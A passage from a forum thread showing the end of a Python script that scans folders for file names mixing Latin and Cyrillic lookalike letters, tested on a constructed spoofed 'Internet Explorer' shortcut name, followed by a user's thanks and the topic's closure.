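    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(suffix):
                hits = mixed_script_words(name)
                if hits:
                    report[os.path.join(folder, name)] = hits
    return report

# Constructed sample: Cyrillic U+0435, U+0415, U+0445, U+0440, U+043E inside Latin words.
SPOOFED = "Int\u0435rn\u0435t \u0415\u0445\u0440l\u043er\u0435r.lnk"

if __name__ == "__main__":
    for hit in mixed_script_words(SPOOFED):
        print(hit["scripts"], [(pos, cp) for pos, cp, _ in hit["non_latin"]])
```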
  • #7 29 Apr 2017 13:05
    amigo10
    Level 11  

    Huge thanks for the help.
    I am closing the topic.

    0